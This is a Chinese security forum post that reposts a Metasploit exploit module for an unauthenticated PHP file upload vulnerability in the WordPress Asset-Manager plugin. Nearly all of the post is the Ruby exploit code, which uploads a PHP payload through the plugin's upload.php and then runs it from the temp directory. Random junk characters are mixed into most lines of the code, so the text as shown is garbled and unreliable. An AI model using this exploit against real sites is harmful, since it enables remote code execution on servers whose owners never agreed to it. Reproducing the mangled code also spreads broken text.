找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2416|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。# @, Y! A8 a) o) w+ |4 M' Q

9 E' \, U" q" o/ V  o##
1 U2 r3 {# V8 |) ^# This file is part of the Metasploit Framework and may be subject to
& y7 @  u+ c+ n3 U! d  H1 Z# redistribution and commercial restrictions. Please see the Metasploit2 G5 j2 e3 m0 W
# Framework web site for more information on licensing and terms of use.
2 \1 p3 ^, Y$ i) j; U' k& J#   http://metasploit.com/framework/
, J9 N' U0 \, P/ B2 O##
4 O, P3 Y  O! W
- i2 t5 Z( F3 O% H) Y8 Grequire 'msf/core'; s; f' L2 g/ S6 `$ y
require 'msf/core/exploit/php_exe'
7 E9 U" J2 g5 B1 a " p, T5 t3 c/ j; p) o$ L
class Metasploit3 < Msf::Exploit::Remote; ^$ w; U) N! R; D. I
  Rank = ExcellentRanking8 [; {# d2 K/ C/ G2 |9 _

: R: m$ m3 T  J4 V' M9 j5 k  include Msf::Exploit::Remote::HttpClient
+ @* `( f1 z) x) J7 N7 P; d  include Msf::Exploit:hpEXE. _# y) V# q( Y8 ^8 A; W" S$ i8 E
* o; o6 J4 e8 V( s- @: e
  def initialize(info = {}); D2 s( V8 E$ e' b) ?
    super(update_info(info,8 u5 i5 F8 g3 R- C( q2 `+ b
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
! [- z$ y) _  u8 j" w      'Description'    => %q{+ E5 @! w9 ~/ Y* g: g  a  C
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress# ^4 n$ X6 F4 ^8 `- o$ S- H
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a# ?. ?3 c0 [/ B* r: ~" t
        temp directory without authentication, which results in arbitrary code execution.
* n0 B9 F4 p) N" r) l+ _% x! q      },
2 b9 o$ N( _; L0 n      'Author'         =>
% z9 A' I5 J4 h        [
& _% ]* v& o; Z+ c# F: R; c          'Sammy FORGIT', # initial discovery* J+ r* H# {# T) _
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module- h8 N9 h7 @! `0 ?+ V
        ],! t* I3 }7 j2 g2 M
      'License'        => MSF_LICENSE,% Y, G& U% r/ J; [. N
      'References'     =>% w2 P" Y/ y/ P4 s3 _. R" ?
        [
& G1 C9 Q: j* v1 G- d" ~          [ 'OSVDB', '82653' ],/ \( f: {# H3 ?" l5 }2 t2 [
          [ 'BID', '53809' ],
2 g- b  P! @' J5 }; s  h) C          [ 'EDB', '18993' ],
& G  W7 c. p" m7 q3 f          [ 'URL', 'http:// www.myhack58.com /' ]( G" y1 t9 q0 a! D. U/ E
        ],& \" N( ^/ P6 K2 [% u' D1 g
      'Payload'       =>
4 D/ Z; {/ C, X& D8 N- S" \+ R        {
# L1 g" @. `$ y          'BadChars' => "\x00",
6 N% f, J5 [# d( i        },
  f9 K' I  ^. T: K; d" Q      'Platform'       => 'php',
8 F5 _: @- z/ B: O/ F$ l! D, M      'Arch'           => ARCH_PHP,
7 X; c& f& v7 [) c+ i      'Targets'        =># U& J! t3 m7 G, v- f' r; s6 Z+ u
        [
7 n4 w, w7 b) ]( {: U/ e+ E          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
! }& s  F. D5 Q* \          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]  r& J+ E! R" s/ ]% K
        ],
3 _- x! Y: ]9 ?4 I! ]- |# ]      'DefaultTarget' => 0,, x+ f3 b' ?" ^! a! V$ f$ ?
      'DisclosureDate' => 'May 26 2012'))3 h4 u- k9 K2 ~( R- `6 |6 _

" k& h- U/ O1 o1 w    register_options(1 r2 K' w3 N- Y, q' L; R- \& A
      [
0 E6 \  Y3 R  B$ w/ M) ~        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 `0 k. j# m* K/ v
      ], self.class)
# n- i6 z7 F; L/ y, ^% H  end
' h  i- |% m/ K: J0 e" i( n; B! R : p+ W$ }0 u9 I  {$ }, S
  def exploit& m: ~/ X( [# H8 T* U0 b7 G9 q
    uri =  target_uri.path, f5 a6 w- J6 Z: [
    uri << '/' if uri[-1,1] != '/'' s6 e, U( h( J5 ?7 l
    peer = "#{rhost}:#{rport}"* n8 m! |: b% ~' U$ f
    payload_name = "#{rand_text_alpha(5)}.php"! [7 z0 J2 o1 q) p3 Q# b
    php_payload = get_write_exec_payload(:unlink_self=>true)
0 D4 m; c, g, E8 l% \7 o  {
- E# i; L+ ~7 \. T4 y    data = Rex::MIME::Message.new
" b! E& f5 y# Y9 L    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")0 L1 T7 l+ ]2 e5 D2 M9 _
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+ D9 k* `1 T/ {: ]; L9 ~2 {5 c : M: A5 T9 ^/ l
    print_status("#{peer} - Uploading payload #{payload_name}")1 P2 w$ P6 ?! j8 ~
    res = send_request_cgi({- `" A  g& Q& Y! s, Z; ?: ~
      'method'  => 'POST',. z/ \. t* ?# V5 k5 g5 ]: Q
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",1 y; e4 w0 o4 Z3 l. u
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
! X1 B5 R% _& x      'data'    => post_data
) q/ _8 D- ~: }' h. T$ ]! i    })
. n, L# f% {" n 4 G) V6 Z$ e; j. _9 V
    if not res or res.code != 200 or res.body !~ /#{payload_name}/0 W! M2 Z# B7 p: x  x
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")) m* Y" L9 ]& M( X4 A$ z
end
# M2 w( x6 L' `3 m7 `, ]9 f
4 O" V5 V# `& |$ {    print_status("#{peer} - Executing payload #{payload_name}")
$ L) `. I$ w+ q! c    res = send_request_raw({5 t' g2 t+ @/ ?" c
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
# ~& x! X; m, ]; E' }; h8 H      'method'  => 'GET'
/ U, c% y' \7 P" K9 V1 \, ~    })6 P2 v# O7 h: Y; d7 M# Q; B

9 R2 A% f1 K) x. U: ~, V    if res and res.code != 200* x  m; |, a5 u% F
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
4 y" T2 [4 q' W% D    end
0 g: O% b# H! ^/ t& R3 X. g/ `  end
. R1 \7 f* f8 E7 l7 |- Fend
% j' m. m' L' }4 q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表